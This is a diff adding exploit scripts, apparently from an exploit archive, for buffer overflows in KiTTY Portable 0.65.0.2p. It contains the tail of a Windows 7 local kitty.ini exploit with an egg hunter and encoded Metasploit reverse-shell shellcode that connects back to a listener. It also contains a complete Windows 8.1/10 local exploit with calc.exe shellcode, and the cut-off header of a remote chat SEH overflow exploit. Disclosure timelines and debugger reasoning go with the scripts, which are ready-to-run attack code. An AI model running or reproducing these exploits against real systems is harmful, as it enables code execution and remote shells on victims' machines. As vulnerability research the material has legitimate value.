+2015-09-28: Vendor answer +2015-10-09: KiTTY 0.65.0.3p released : unintentionally (vendor said) preventing exploit from working, without fixing the core vulnerability +2015-10-20: KiTTY 0.65.1.1p released, vendor fix, but app can still be crashed using same vulnerability on another kitty.ini parameter +2015-11-15: KiTTY 0.66.6.1p released, seems fixed +2015-12-28: exploit published + +Description : +------------- +A local overflow exists in kitty.ini file used by KiTTY portable. By writing a 1048 bytes string into +the kitty.ini file, an overflow occurs that makes Kitty crashing. At time of the crash, EIP is +overwritten at offset 1036. As all DLLs are ALSR and DEP protected, and rebased, we can only use +kitty_portable.exe addresses, which start with a NULL. Successful exploitation will grant an +attacker a reverse shell on Windows 7 Pro x64. + +Win7 -> Code Execution + +Instructions: +------------- +- Run exploit +- Launch KiTTY + +Exploitation: +------------- +As EDX register points to our buffer, it seems like using a return address pointing to a +JMP EDX instruction would do the trick. However this is not the case, because of the address containing +a NULL byte, our 1048 bytes buffer is truncated to 1039 bytes, and an access violation occurs before EIP could be +overwritten: + +EAX = 00000041 +00533DA2 0000 ADD BYTE PTR DS:[EAX],AL <---- Access violation when writing to [EAX] +00533DA4 00 DB 00 + +Increasing our initial buffer by 4 bytes (1052 bytes) gives us another crash, +but neither EIP nor SEH are overwritten. We end up with another memory access violation, which although looking +like a deadend, is in fact exploitable: + +ECX and EBX points to our buffer +EDX and EDI are overwritten by our buffer + +EDI = 41414141 +764F8DD2 8917 MOV DWORD PTR DS:[EDI],EDX <---- Access violation when writing to [EDI] + +Although we do not have control over the execution flow (EIP), we have at least control of the value written to EDI +at offset 1048. We can write a valid memory address into EDI, allowing the program to continue +its execution. One such address is the address ESP points to on the stack: 0x0028C4F8. +Let's take a closer look to the code executed: + + +764F8DB8 BA FFFEFE7E MOV EDX,7EFEFEFF <-------- (3) JMP back here +764F8DBD 8B01 MOV EAX,DWORD PTR DS:[ECX] +764F8DBF 03D0 ADD EDX,EAX +764F8DC1 83F0 FF XOR EAX,FFFFFFFF +764F8DC4 33C2 XOR EAX,EDX +764F8DC6 8B11 MOV EDX,DWORD PTR DS:[ECX] +764F8DC8 83C1 04 ADD ECX,4 +764F8DCB A9 00010181 TEST EAX,81010100 +764F8DD0 75 07 JNZ SHORT msvcrt.764F8DD9 + +764F8DD2 8917 MOV DWORD PTR DS:[EDI],EDX <------- (1) We start HERE +764F8DD4 83C7 04 ADD EDI,4 +764F8DD7 EB DF JMP SHORT msvcrt.764F8DB8 <------- (2) jump back above + +1) Value from EDX is copied to the stack where EDI points to, then EDI is incremented and points to next address +2) The execution jumps back at the beginning of the code block, overwrites our source register EDX with 7EFEFEFF, +overwrites EAX with 41414141 (ECX point to our buffer), restore EDX with 41414141, increment ECX pointing to our +buffer by 4, pointing to our next buffer value, and starting all over again. Also there is a very interesting instruction +following this code: + +764F8DD2 8917 MOV DWORD PTR DS:[EDI],EDX <------- We are HERE +764F8DD4 83C7 04 ADD EDI,4 +764F8DD7 EB DF JMP SHORT msvcrt.764F8DB8 +764F8DD9 84D2 TEST DL,DL +764F8DDB 74 32 JE SHORT msvcrt.764F8E0F +764F8DDD 84F6 TEST DH,DH +764F8DDF 74 15 JE SHORT msvcrt.764F8DF6 +764F8DE1 F7C2 0000FF00 TEST EDX,0FF0000 +764F8DE7 75 16 JNZ SHORT msvcrt.764F8DFF +764F8DE9 66:8917 MOV WORD PTR DS:[EDI],DX +764F8DEC 8B4424 08 MOV EAX,DWORD PTR SS:[ESP+8] +764F8DF0 C647 02 00 MOV BYTE PTR DS:[EDI+2],0 +764F8DF4 5F POP EDI +764F8DF5 C3 RETN <------- We want that ! + +This code block happily copies our entire buffer chunk by chunk to the stack, and is later followed by a RET instruction. +If there could be a way to copy our buffer on the stack and make ESP pointing to a predictable part or our buffer, the RET would +give us the control of the execution flow. + +When the copy operation is finished, the code crashes again and this time EIP is overwritten with 41414141, and ESP +has the address 0x0028C500 pointing toward the near begining of our buffer (offset 8). The RET has been reached, wonderful :-) + +However, we cannot write a usable address here to jump somewhere else as a NULL byte would truncate our entire buffer and no +crash would occur... The goal here would be to find the correct address to put into EDI so that ESP will point to the end +of our buffer, where we will be able to use another address, containing a NULL, to jump somewhere else and +take back control of the execution flow. However our buffer is already terminated by a NULL byte address for EDI. + +1) We cannot make ESP points anywhere in the middle of our buffer, as we can only use addresses containing a NULL +2) We cannot add another valid NULL containing address at the end of our buffer, as a stack address containing a NULL is there +for EDI +3) EDI contains an address already pointing to the start of our buffer, thanks to the copy operation, our only chance is to try +to make ESP pointing to it when the crash happens. + +After testing by incrementing or decrementing EDI address value, it appears ESP always point to 0x0028C500 at time +of the crash. This means we can calculate the correct offset to align EDI address with ESP, just before the RET happens to make +EIP following that address. The EDI address to achieve that is: (EIP)0x0028C500 - (buffer length)1052 = 0x0028C0E4. +As our buffer is copied onto a NULLs filled zone, we can omit the NULL byte and set EDI to '\xE4\xC0\x28'. + +To sume it up: +1) First crash with EIP overwritten seems not exploitable +2) Second crash does not have EIP nor SEH overwritten (memory access violation), we only have "control" over some registers +3) Tweaking values of EDX and EDI, makes the program continue execution and copying our buffer onto the stack +4) The RET instruction is reached and execution crashes again +5) We find an EDI address value which is valid for a) copying our buffer on stack, b) is aligning itself with ESP at the correct +offset and c) will appear on the stack and be used by the RET instruction, giving us finally control over the execution flow. + +That is like being forbidden to enter a building, but we give two bags (EDI + EDX) to someone authorized who enters the building, +who do all the work for us inside, and goes out back to us with the vault key (EIP). + +Finally, as the memory area we land in is not reliable for bigger shellcode such as reverse shell, using an egg hunter is required. +""" + +egg = "w00t" # \x77\x30\x30\x74 + +# Wow64 Egghunter - Corelan Team +# Written by Lincoln (lincoln@corelan.be) +# Size: 46 bytes +egghunter = ( +"\x31\xdb" # XOR EBX, EBX +"\x53" # PUSH EBX +"\x53" # PUSH EBX +"\x53" # PUSH EBX +"\x53" # PUSH EBX +"\xb3\xc0" # MOV BL,0xc0 +"\x66\x81\xCA\xFF\x0F" # OR DX,0FFF +"\x42" # INC EDX +"\x52" # PUSH EDX +"\x6A\x26" # PUSH 26 +"\x58" # POP EAX +"\x33\xC9" # XOR ECX,ECX +"\x8B\xD4" # MOV EDX,ESP +"\x64\xff\x13" # CALL DWORD PTR FS:[ebx] +"\x5e" # POP ESI +"\x5a" # POP EDX +"\x3C\x05" # CMP AL,5 +"\x74\xe9" # JE SHORT egg.0043F000 +"\xB8\x77\x30\x30\x74" # MOV EAX,74303077 w00t +"\x8B\xFA" # MOV EDI,EDX +"\xAF" # SCAS DWORD PTR ES:[EDI] +"\x75\xe4" # JNZ SHORT egg.0043F001 +"\xAF" # SCAS DWORD PTR ES:[EDI] +"\x75\xe1" # JNZ SHORT 0043F001 +"\xFF\xE7" # JMP EDI +) + +# Metasploit Reverse Shell 192.168.135.131:4444 (replace it with any shellcode you want) +# Encoder: x86/alpha_mixed +# Bad chars: \x00\x0a\x0d\x21\x11\x1a\x01\x31 +# Size: 710 bytes +shellcode = ( +"\x89\xe3\xda\xd4\xd9\x73\xf4\x5f\x57\x59\x49\x49\x49\x49\x49" +"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" +"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" +"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +"\x6b\x4c\x48\x68\x4c\x42\x45\x50\x57\x70\x67\x70\x33\x50\x4e" +"\x69\x49\x75\x35\x61\x39\x50\x53\x54\x6c\x4b\x32\x70\x76\x50" +"\x6c\x4b\x56\x32\x46\x6c\x4c\x4b\x73\x62\x46\x74\x4c\x4b\x72" +"\x52\x54\x68\x64\x4f\x6f\x47\x33\x7a\x57\x56\x44\x71\x49\x6f" +"\x6c\x6c\x55\x6c\x63\x51\x33\x4c\x77\x72\x56\x4c\x61\x30\x6a" +"\x61\x4a\x6f\x76\x6d\x66\x61\x6f\x37\x6b\x52\x6a\x52\x56\x32" +"\x73\x67\x4c\x4b\x62\x72\x46\x70\x6c\x4b\x33\x7a\x67\x4c\x4c" +"\x4b\x30\x4c\x76\x71\x64\x38\x49\x73\x53\x78\x77\x71\x4b\x61" +"\x53\x61\x4c\x4b\x30\x59\x51\x30\x35\x51\x4a\x73\x4c\x4b\x47" +"\x39\x67\x68\x68\x63\x36\x5a\x33\x79\x6e\x6b\x44\x74\x6c\x4b" +"\x36\x61\x6b\x66\x44\x71\x49\x6f\x4e\x4c\x49\x51\x38\x4f\x56" +"\x6d\x66\x61\x6f\x37\x56\x58\x4b\x50\x51\x65\x59\x66\x54\x43" +"\x43\x4d\x68\x78\x45\x6b\x63\x4d\x75\x74\x33\x45\x4a\x44\x30" +"\x58\x6c\x4b\x71\x48\x35\x74\x47\x71\x5a\x73\x65\x36\x6c\x4b" +"\x76\x6c\x42\x6b\x6e\x6b\x30\x58\x55\x4c\x36\x61\x79\x43\x6c" +"\x4b\x55\x54\x6e\x6b\x37\x71\x7a\x70\x6b\x39\x70\x44\x71\x34" +"\x65\x74\x43\x6b\x53\x6b\x73\x51\x73\x69\x42\x7a\x73\x61\x4b" +"\x4f\x4d\x30\x73\x6f\x53\x6f\x32\x7a\x4c\x4b\x62\x32\x68\x6b" +"\x6e\x6d\x63\x6d\x30\x68\x50\x33\x44\x72\x63\x30\x53\x30\x33" +"\x58\x50\x77\x43\x43\x45\x62\x71\x4f\x30\x54\x43\x58\x72\x6c" +"\x54\x37\x34\x66\x73\x37\x6b\x4f\x6e\x35\x4e\x58\x7a\x30\x76" +"\x61\x37\x70\x65\x50\x64\x69\x6a\x64\x32\x74\x72\x70\x50\x68" +"\x34\x69\x4d\x50\x62\x4b\x45\x50\x79\x6f\x68\x55\x46\x30\x56" +"\x30\x66\x30\x62\x70\x73\x70\x72\x70\x63\x70\x72\x70\x42\x48" +"\x38\x6a\x74\x4f\x6b\x6f\x6b\x50\x79\x6f\x69\x45\x6f\x67\x63" +"\x5a\x65\x55\x50\x68\x79\x50\x6c\x68\x6d\x57\x4d\x53\x32\x48" +"\x36\x62\x57\x70\x67\x61\x43\x6c\x6b\x39\x4b\x56\x71\x7a\x76" +"\x70\x73\x66\x51\x47\x43\x58\x6f\x69\x59\x35\x54\x34\x43\x51" +"\x79\x6f\x49\x45\x4e\x65\x4f\x30\x63\x44\x44\x4c\x79\x6f\x50" +"\x4e\x56\x68\x53\x45\x7a\x4c\x73\x58\x6c\x30\x4e\x55\x4c\x62" +"\x46\x36\x69\x6f\x38\x55\x55\x38\x53\x53\x42\x4d\x70\x64\x55" +"\x50\x4e\x69\x68\x63\x33\x67\x72\x77\x76\x37\x36\x51\x4a\x56" +"\x61\x7a\x54\x52\x46\x39\x53\x66\x4b\x52\x69\x6d\x71\x76\x49" +"\x57\x30\x44\x46\x44\x77\x4c\x57\x71\x47\x71\x4e\x6d\x47\x34" +"\x37\x54\x62\x30\x58\x46\x77\x70\x53\x74\x43\x64\x52\x70\x42" +"\x76\x43\x66\x33\x66\x51\x56\x53\x66\x72\x6e\x66\x36\x46\x36" +"\x52\x73\x72\x76\x30\x68\x52\x59\x48\x4c\x47\x4f\x4b\x36\x6b" +"\x4f\x59\x45\x6f\x79\x4b\x50\x52\x6e\x51\x46\x57\x36\x39\x6f" +"\x66\x50\x75\x38\x55\x58\x4d\x57\x45\x4d\x51\x70\x69\x6f\x4e" +"\x35\x6f\x4b\x78\x70\x6c\x75\x6d\x72\x42\x76\x32\x48\x4d\x76" +"\x7a\x35\x4d\x6d\x6d\x4d\x79\x6f\x68\x55\x57\x4c\x65\x56\x71" +"\x6c\x74\x4a\x6d\x50\x69\x6b\x4b\x50\x70\x75\x55\x55\x4f\x4b" +"\x72\x67\x34\x53\x73\x42\x72\x4f\x73\x5a\x63\x30\x52\x73\x4b" +"\x4f\x39\x45\x41\x41" +) + +# Stack address where to copy our shellcode, with an offset of ESP - 1052 +edi = '\xE4\xC0\x28' # 0x0028C0E4 WIN7 Pro x64 + +nops = '\x90' * 8 +eggmark = egg * 2 +padding = '\x41' * (1048 - len(nops) - len(egghunter)) + +# The memory area we land makes bigger shellcode crashes after being decoded +# Using a 46 bytes egg hunter and putting our shellcode somewhere else solves this problem +payload1 = nops + egghunter + padding + edi # Egg Hunter +payload2 = eggmark + nops + shellcode # Final Shellcode + +# Kitty.ini configuration file +buffer ="[ConfigBox]\n" +buffer +="height=22\n" +buffer +="filter=yes\n" +buffer +="#default=yes\n" +buffer +="#noexit=no\n" +buffer +="[KiTTY]\n" +buffer +="backgroundimage=no\n" +buffer +="capslock=no\n" +buffer +="conf=yes\n" +buffer +="cygterm=yes\n" +buffer +="icon=no\n" +buffer +="#iconfile=\n" +buffer +="#numberoficons=45\n" +buffer +="paste=no\n" +buffer +="print=yes\n" +buffer +="scriptfilefilter=\n" +buffer +="size=no\n" +buffer +="shortcuts=yes\n" +buffer +="mouseshortcuts=yes\n" +buffer +="hyperlink=no\n" +buffer +="transparency=no\n" +buffer +="#configdir=\n" +buffer +="#downloaddir=\n" +buffer +="#uploaddir=\n" +buffer +="remotedir=\n" +buffer +="#PSCPPath=\n" +buffer +="#PlinkPath=\n" +buffer +="#WinSCPPath=\n" +buffer +="#CtHelperPath=\n" +buffer +="#antiidle== \k08\\\n" +buffer +="#antiidledelay=60\n" +buffer +="sshversion=" + payload2 + "\n" # Shellcode +buffer +="#WinSCPProtocol=sftp\n" +buffer +="#autostoresshkey=no\n" +buffer +="#UserPassSSHNoSave=no\n" +buffer +="KiClassName=" + payload1 + "\n" # Egg Hunter +buffer +="#ReconnectDelay=5\n" +buffer +="savemode=dir\n" +buffer +="bcdelay=0\n" +buffer +="commanddelay=5\n" +buffer +="initdelay=2.0\n" +buffer +="internaldelay=10\n" +buffer +="slidedelay=0\n" +buffer +="wintitle=yes\n" +buffer +="zmodem=yes\n" +buffer +="[Print]\n" +buffer +="height=100\n" +buffer +="maxline=60\n" +buffer +="maxchar=85\n" +buffer +="[Folder]\n" +buffer +="[Launcher]\n" +buffer +="reload=yes\n" +buffer +="[Shortcuts]\n" +buffer +="print={SHIFT}{F7}\n" +buffer +="printall={F7}\n" + +# Location of our Kitty.ini file (modify with your KiTTY directory) +file = "C:\\kitty\\App\\KiTTY\\kitty.ini" +try: + print "[*] Writing to %s (%s bytes)" % (file, len(buffer)) + f = open(file,'w') + f.write(buffer) + f.close() + print "[*] Done!" +except: + print "[-] Error writing %s" % file \ No newline at end of file diff --git a/platforms/windows/local/39122.py b/platforms/windows/local/39122.py new file mode 100755 index 000000000..bc167fb16 --- /dev/null +++ b/platforms/windows/local/39122.py @@ -0,0 +1,263 @@ +# Exploit Title: KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Win8.1/Win10) +# Date: 28/12/2015 +# Exploit Author: Guillaume Kaddouch +# Twitter: @gkweb76 +# Blog: http://networkfilter.blogspot.com +# GitHub: https://github.com/gkweb76/exploits +# Vendor Homepage: http://www.9bis.net/kitty/ +# Software Link: http://sourceforge.net/projects/portableapps/files/KiTTY%20Portable/KiTTYPortable_0.65.0.2_English.paf.exe +# Version: 0.65.0.2p +# Tested on: Windows 8.1 Pro x64 (FR), Windows 10 Pro x64 (FR) +# Category: Local + +""" +Disclosure Timeline: +-------------------- +2015-09-18: Vulnerability discovered +2015-09-26: Vendor contacted +2015-09-28: Vendor answer +2015-10-09: KiTTY 0.65.0.3p released : unintentionally (vendor said) preventing exploit from working, without fixing the core vulnerability +2015-10-20: KiTTY 0.65.1.1p released, vendor fix, but app can still be crashed using same vulnerability on another kitty.ini parameter +2015-11-15: KiTTY 0.66.6.1p released, seems fixed +2015-12-28: exploit published + +Description : +------------- +A local overflow exists in kitty.ini file used by KiTTY portable. By writing a 1048 bytes string into +the kitty.ini file, an overflow occurs that makes Kitty crashing. At time of the crash, EIP is +overwritten at offset 1036. As all DLLs are ALSR and DEP protected, and rebased, we can only use +kitty_portable.exe addresses, which start with a NULL. Successful exploitation will allow to execute +local executables on Windows 8.1 and Windows 10. + +Win8.1 -> Code Execution +Win10 -> Code Execution + +Instructions: +------------- +- Run exploit +- Launch KiTTY + +Exploitation: +------------- +As EDX register points to our buffer, it seems like using a return address pointing to a +JMP EDX instruction would do the trick. However this is not the case, because of the address containing +a NULL byte, our 1048 bytes buffer is truncated to 1039 bytes, and an access violation occurs before EIP could be +overwritten: + +EAX = 00000041 +00533DA2 0000 ADD BYTE PTR DS:[EAX],AL <---- Access violation when writing to [EAX] +00533DA4 00 DB 00 + +Increasing our initial buffer by 4 bytes (1052 bytes) gives us another crash, +but neither EIP nor SEH are overwritten. We end up with another memory access violation, which although looking +like a deadend, is in fact exploitable: + +ECX and EBX points to our buffer +EDX and EDI are overwritten by our buffer + +EDI = 41414141 +764F8DD2 8917 MOV DWORD PTR DS:[EDI],EDX <---- Access violation when writing to [EDI] + +Although we do not have control over the execution flow (EIP), we have at least control of the value written to EDI +at offset 1048. We can write a valid memory address into EDI, allowing the program to continue +its execution. One such address is the address ESP points to on the stack: 0x0028C4F8. +Let's take a closer look to the code executed: + + +764F8DB8 BA FFFEFE7E MOV EDX,7EFEFEFF <-------- (3) JMP back here +764F8DBD 8B01 MOV EAX,DWORD PTR DS:[ECX] +764F8DBF 03D0 ADD EDX,EAX +764F8DC1 83F0 FF XOR EAX,FFFFFFFF +764F8DC4 33C2 XOR EAX,EDX +764F8DC6 8B11 MOV EDX,DWORD PTR DS:[ECX] +764F8DC8 83C1 04 ADD ECX,4 +764F8DCB A9 00010181 TEST EAX,81010100 +764F8DD0 75 07 JNZ SHORT msvcrt.764F8DD9 + +764F8DD2 8917 MOV DWORD PTR DS:[EDI],EDX <------- (1) We start HERE +764F8DD4 83C7 04 ADD EDI,4 +764F8DD7 EB DF JMP SHORT msvcrt.764F8DB8 <------- (2) jump back above + +1) Value from EDX is copied to the stack where EDI points to, then EDI is incremented and points to next address +2) The execution jumps back at the beginning of the code block, overwrites our source register EDX with 7EFEFEFF, +overwrites EAX with 41414141 (ECX point to our buffer), restore EDX with 41414141, increment ECX pointing to our +buffer by 4, pointing to our next buffer value, and starting all over again. Also there is a very interesting instruction +following this code: + +764F8DD2 8917 MOV DWORD PTR DS:[EDI],EDX <------- We are HERE +764F8DD4 83C7 04 ADD EDI,4 +764F8DD7 EB DF JMP SHORT msvcrt.764F8DB8 +764F8DD9 84D2 TEST DL,DL +764F8DDB 74 32 JE SHORT msvcrt.764F8E0F +764F8DDD 84F6 TEST DH,DH +764F8DDF 74 15 JE SHORT msvcrt.764F8DF6 +764F8DE1 F7C2 0000FF00 TEST EDX,0FF0000 +764F8DE7 75 16 JNZ SHORT msvcrt.764F8DFF +764F8DE9 66:8917 MOV WORD PTR DS:[EDI],DX +764F8DEC 8B4424 08 MOV EAX,DWORD PTR SS:[ESP+8] +764F8DF0 C647 02 00 MOV BYTE PTR DS:[EDI+2],0 +764F8DF4 5F POP EDI +764F8DF5 C3 RETN <------- We want that! + +This code block happily copies our entire buffer chunk by chunk to the stack, and is later followed by a RET instruction. +If there could be a way to copy our buffer on the stack and make ESP pointing to a predictable part or our buffer, the RET would +give us the control of the execution flow. + +When the copy operation is finished, the code crashes again and this time EIP is overwritten with 41414141, and ESP +has the address 0x0028C500 pointing toward the near begining of our buffer (offset 8). The RET has been reached, wonderful :-) + +However, we cannot write a usable address here to jump somewhere else as a NULL byte would truncate our entire buffer and no +crash would occur... The goal here would be to find the correct address to put into EDI so that ESP will point to the end +of our buffer, where we will be able to use another address, containing a NULL, to jump somewhere else and +take back control of the execution flow. However our buffer is already terminated by a NULL byte address for EDI. + +1) We cannot make ESP points anywhere in the middle of our buffer, as we can only use addresses containing a NULL +2) We cannot add another valid NULL containing address at the end of our buffer, as a stack address containing a NULL is there +for EDI +3) EDI contains an address already pointing to the start of our buffer, thanks to the copy operation, our only chance is to try +to make ESP pointing to it when the crash happens. + +After testing by incrementing or decrementing EDI address value, it appears ESP always point to 0x0028C500 at time +of the crash. This means we can calculate the correct offset to align EDI address with ESP, just before the RET happens to make +EIP following that address. The EDI address to achieve that is: (EIP)0x0028C500 - (buffer length)1052 = 0x0028C0E4. +As our buffer is copied onto a NULLs filled zone, we can omit the NULL byte and set EDI to '\xE4\xC0\x28'. + +To sume it up: +1) First crash with EIP overwritten seems not exploitable +2) Second crash does not have EIP nor SEH overwritten (memory access violation), we only have "control" over some registers +3) Tweaking values of EDX and EDI, makes the program continue execution and copying our buffer onto the stack +4) The RET instruction is reached and execution crashes again +5) We find an EDI address value which is valid for a) copying our buffer on stack, b) is aligning itself with ESP at the correct +offset and c) will appear on the stack and be used by the RET instruction, giving us finally control over the execution flow. + +That is like being forbidden to enter a building, but we give two bags (EDI + EDX) to someone authorized who enters the building, +who do all the work for us inside, and goes out back to us with the vault key (EIP). +""" + +import sys + +if len(sys.argv) == 1: + print "\nUsage: kitty_ini_8_10.py " + print "Example: kitty_ini_8_10.py win8.1" + sys.exit() + +os = sys.argv[1] # Windows version to target + +# Metasploit WinExec shellcode (calc.exe) +# Encoder: x86/alpha_mixed +# Bad chars: \x00\x0a\x0d\x21\x11\x1a\x01\x31 +# Size: 448 bytes +shellcode = ( +"\x89\xe6\xdd\xc7\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x49" +"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" +"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" +"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +"\x69\x6c\x39\x78\x6f\x72\x57\x70\x77\x70\x65\x50\x55\x30\x6c" +"\x49\x39\x75\x66\x51\x4f\x30\x65\x34\x4e\x6b\x70\x50\x56\x50" +"\x4c\x4b\x70\x52\x36\x6c\x6e\x6b\x50\x52\x76\x74\x4c\x4b\x74" +"\x32\x64\x68\x76\x6f\x48\x37\x50\x4a\x77\x56\x55\x61\x69\x6f" +"\x6c\x6c\x45\x6c\x33\x51\x33\x4c\x35\x52\x34\x6c\x61\x30\x6b" +"\x71\x38\x4f\x34\x4d\x76\x61\x5a\x67\x4b\x52\x38\x72\x63\x62" +"\x52\x77\x4e\x6b\x76\x32\x46\x70\x4e\x6b\x32\x6a\x47\x4c\x4e" +"\x6b\x50\x4c\x54\x51\x52\x58\x38\x63\x70\x48\x35\x51\x58\x51" +"\x30\x51\x6c\x4b\x61\x49\x57\x50\x37\x71\x5a\x73\x6c\x4b\x30" +"\x49\x56\x78\x39\x73\x66\x5a\x52\x69\x6c\x4b\x57\x44\x6e\x6b" +"\x57\x71\x6b\x66\x34\x71\x4b\x4f\x6e\x4c\x59\x51\x48\x4f\x64" +"\x4d\x67\x71\x58\x47\x75\x68\x6b\x50\x72\x55\x68\x76\x74\x43" +"\x43\x4d\x6c\x38\x45\x6b\x73\x4d\x61\x34\x44\x35\x4d\x34\x51" +"\x48\x4e\x6b\x71\x48\x34\x64\x76\x61\x39\x43\x35\x36\x4e\x6b" +"\x74\x4c\x62\x6b\x4e\x6b\x50\x58\x67\x6c\x47\x71\x4b\x63\x6e" +"\x6b\x65\x54\x6c\x4b\x76\x61\x38\x50\x4c\x49\x37\x34\x75\x74" +"\x37\x54\x73\x6b\x63\x6b\x71\x71\x53\x69\x52\x7a\x43\x61\x79" +"\x6f\x59\x70\x51\x4f\x61\x4f\x32\x7a\x4c\x4b\x42\x32\x58\x6b" +"\x4e\x6d\x61\x4d\x43\x5a\x36\x61\x6c\x4d\x4d\x55\x6c\x72\x47" +"\x70\x67\x70\x77\x70\x42\x70\x32\x48\x45\x61\x4e\x6b\x70\x6f" +"\x6e\x67\x4b\x4f\x59\x45\x4f\x4b\x4a\x50\x6e\x55\x39\x32\x30" +"\x56\x30\x68\x4c\x66\x4c\x55\x6f\x4d\x4d\x4d\x49\x6f\x4e\x35" +"\x55\x6c\x74\x46\x33\x4c\x64\x4a\x6b\x30\x6b\x4b\x4d\x30\x42" +"\x55\x47\x75\x6f\x4b\x70\x47\x67\x63\x30\x72\x30\x6f\x53\x5a" +"\x43\x30\x63\x63\x4b\x4f\x38\x55\x32\x43\x61\x71\x50\x6c\x42" +"\x43\x34\x6e\x33\x55\x44\x38\x43\x55\x33\x30\x41\x41" +) + +# Stack address where to copy our shellcode, with an offset of ESP - 1052 +if os == "win8.1": + edi = '\xD4\xC0\x28' # 0x0028C0D4 WIN8.1 Pro x64 +elif os == "win10": + edi = '\xD4\xC0\x29' # 0x0029C0D4 WIN10 Pro x64 +else: + print "Unknown OS chosen. Please choose 'win8.1' or 'win10'." + sys.exit() + +nops = '\x90' * 8 +padding = '\x41' * (1048 - len(nops) - len(shellcode)) + +payload = nops + shellcode + padding + edi + +# Kitty.ini configuration file +buffer ="[ConfigBox]\n" +buffer +="height=22\n" +buffer +="filter=yes\n" +buffer +="#default=yes\n" +buffer +="#noexit=no\n" +buffer +="[KiTTY]\n" +buffer +="backgroundimage=no\n" +buffer +="capslock=no\n" +buffer +="conf=yes\n" +buffer +="cygterm=yes\n" +buffer +="icon=no\n" +buffer +="#iconfile=\n" +buffer +="#numberoficons=45\n" +buffer +="paste=no\n" +buffer +="print=yes\n" +buffer +="scriptfilefilter=\n" +buffer +="size=no\n" +buffer +="shortcuts=yes\n" +buffer +="mouseshortcuts=yes\n" +buffer +="hyperlink=no\n" +buffer +="transparency=no\n" +buffer +="#configdir=\n" +buffer +="#downloaddir=\n" +buffer +="#uploaddir=\n" +buffer +="remotedir=\n" +buffer +="#PSCPPath=\n" +buffer +="#PlinkPath=\n" +buffer +="#WinSCPPath=\n" +buffer +="#CtHelperPath=\n" +buffer +="#antiidle== \k08\\\n" +buffer +="#antiidledelay=60\n" +buffer +="sshversion=\n" +buffer +="#WinSCPProtocol=sftp\n" +buffer +="#autostoresshkey=no\n" +buffer +="#UserPassSSHNoSave=no\n" +buffer +="KiClassName=" + payload + "\n" +buffer +="#ReconnectDelay=5\n" +buffer +="savemode=dir\n" +buffer +="bcdelay=0\n" +buffer +="commanddelay=5\n" +buffer +="initdelay=2.0\n" +buffer +="internaldelay=10\n" +buffer +="slidedelay=0\n" +buffer +="wintitle=yes\n" +buffer +="zmodem=yes\n" +buffer +="[Print]\n" +buffer +="height=100\n" +buffer +="maxline=60\n" +buffer +="maxchar=85\n" +buffer +="[Folder]\n" +buffer +="[Launcher]\n" +buffer +="reload=yes\n" +buffer +="[Shortcuts]\n" +buffer +="print={SHIFT}{F7}\n" +buffer +="printall={F7}\n" + +# Kitty.ini file location (modify according to your installation path) +file = "C:\\kitty\\App\\KiTTY\\kitty.ini" +try: + print "[*] Writing to %s (%s bytes)" % (file, len(buffer)) + f = open(file,'w') + f.write(buffer) + f.close() + print "[*] Done!" +except: + print "[-] Error writing %s" % file \ No newline at end of file diff --git a/platforms/windows/remote/39119.py b/platforms/windows/remote/39119.py new file mode 100755 index 000000000..c4c3c674d --- /dev/null +++ b/platforms/windows/remote/39119.py @@ -0,0 +1,341 @@ +# Exploit Title: KiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10) +# Date: 28/12/2015 +# Exploit Author: Guillaume Kaddouch +# Twitter: @gkweb76 +# Blog: http://networkfilter.blogspot.com +# GitHub: https://github.com/gkweb76/exploits +# Vendor Homepage: http://www.9bis.net/kitty/ +# Software Link: http://sourceforge.net/projects/portableapps/files/KiTTY%20Portable/KiTTYPortable_0.65.0.2_English.paf.exe +# Version: 0.65.0.2p +# Tested on: Windows XP SP3 x86 (FR), Windows 7 Pro x64 (FR), Windows 10 Pro x64 builds 10240/10586 (FR) +# CVE: CVE-2015-7874 +# Category: Remote + +""" +Disclosure Timeline: +-------------------- +2015-09-13: Vulnerability discovered +2015-09-26: Vendor contacted +2015-09-28: Vendor answer +2015-10-09: KiTTY 0.65.0.3p released : unintentionally (vendor said) preventing exploit from working, without fixing the core vulnerability +2015-12-28: exploit published + +Other KiTTY versions have been released since 0.65.0.3p, not related to this vulnerability. Vendor said he may release a version without chat in a future release, +while providing an external chat DLL as a separate download. + +Description : +------------- +A remote overflow exists in the KiTTY Chat feature, which enables a remote attacker to execute code on the +vulnerable system with the rights of the current user, from Windows XP x86 to Windows 10 x64 included (builds 10240/10586). +Chat feature is not enabled by default. + +WinXP -> Remote Code Execution +Win7 -> Remote Code Execution +Win10 -> Remote Code Execution + +Instructions: +------------- +- Enable Chat feature in KiTTY portable (add "Chat=1" in kitty.ini) +- Start KiTTY on 127.0.0.1 port 1987 (Telnet) +- Run exploit from remote machine (Kali Linux is fine) + +Exploitation: +------------- +When sending a long string to the KiTTY chat server as nickname, a crash occurs. The EIP overwrite does let little room +for exploitation (offset 54) with no more than 160 to 196 bytes for the shellcode from XP to Windows10. Using a Metasploit +small shellcode such as windows/shell/reverse_ord_tcp (118 bytes encoded) makes KiTTY crashing after the first connection. +We control the SEH overflow, but as all DLLs are SafeSEH protected, using an address from KiTTY itself has a NULL which +forces us to jump backward with no extra space. We are jailed in a tight environment with little room to work with. + +The trick here is to slice our wanted Metasploit bind shellcode in 3 parts (350 bytes total), and send them in 3 +successive buffers, each of them waiting in an infinite loop to not crash the process. Each buffer payload will copy +its shellcode slice to a stable memory location which has enough room to place a bigger shellcode. The final buffer +jumps to that destination memory location where our whole shellcode has been merged, to then proceed with decoding +and execution. This exploit is generic, which means you can even swap the shellcode included with a 850 bytes one, +and it will be sliced in as many buffers as necessary. This method should theoretically be usable for other +exploits and vulnerabilities as well. + +All KiTTY versions prior to 0.65.0.2p should be vulnerable, the only change is the SEH address for the POP POP RET. +I have successfully exploited prior versions 0.63.2.2p and 0.62.1.2p using SEH addresses I have included as comment in the exploit. + +Pro & Cons: +----------- +[+]: works from XP to Windows 10 as it uses addresses from the main executable +[+]: not affected 